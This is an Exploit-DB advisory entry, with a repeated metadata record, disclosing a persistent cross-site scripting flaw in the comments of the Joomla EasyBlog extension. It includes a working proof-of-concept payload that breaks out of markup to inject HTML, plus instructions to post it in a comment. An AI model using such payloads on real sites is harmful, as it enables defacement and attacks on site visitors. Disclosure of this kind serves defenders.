ID EDB-ID:14336 Type exploitdb Reporter Sid3^effects Modified 2010-07-12T00:00:00
Description
Joomla EasyBlog Persistent XSS Vulnerability. Webapps exploit for php platform
Name : Joomla EasyBlog Persistent XSS Vulnerability
Date : july 12,2010
Critical Level : HIGH
vendor URL :http://stackideas.com/products/easyblog.html
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Publishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.
#######################################################################################################
Xploit: Persistent XSS Vulnerability
This vulnerability exists in the comments section.
1. Goto any post and submit your evil xss script in the comment section :P
Attack Pattern:">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
DEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.html
{"bulletinFamily": "exploit", "id": "EDB-ID:14336", "cvelist": [], "modified": "2010-07-12T00:00:00", "lastseen": "2016-02-01T19:37:40", "edition": 1, "sourceData": "Name : Joomla EasyBlog Persistent XSS Vulnerability\r\nDate : july 12,2010\r\nCritical Level \t: HIGH\r\nvendor URL :http://stackideas.com/products/easyblog.html\r\nAuthor : Sid3^effects aKa HaRi \r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_\r\ngreetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz \r\n#######################################################################################################\r\nDescription \r\nPublishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.\r\n#######################################################################################################\r\nXploit: Persistent XSS Vulnerability\r\n\r\nThis vulnerability exists in the comments section.\r\n\r\n1. Goto any post and submit your evil xss script in the comment section :P \r\n\r\nAttack Pattern:\">><marquee><h1>XSS3d by Sid3^effects</h1><marquee> \r\n\r\nDEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.html\r\n", "published": "2010-07-12T00:00:00", "href": "https://www.exploit-db.com/exploits/14336/", "osvdbidlist": [], "reporter": "Sid3^effects", "hash": "cb6748615b9afa31e5c79025fb8948336b6969802bfacb182da4fa2468905622", "title": "Joomla EasyBlog Persistent XSS Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Joomla EasyBlog Persistent XSS Vulnerability. Webapps exploit for php platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/14336/", "enchantments": {"vulnersScore": 6.3}}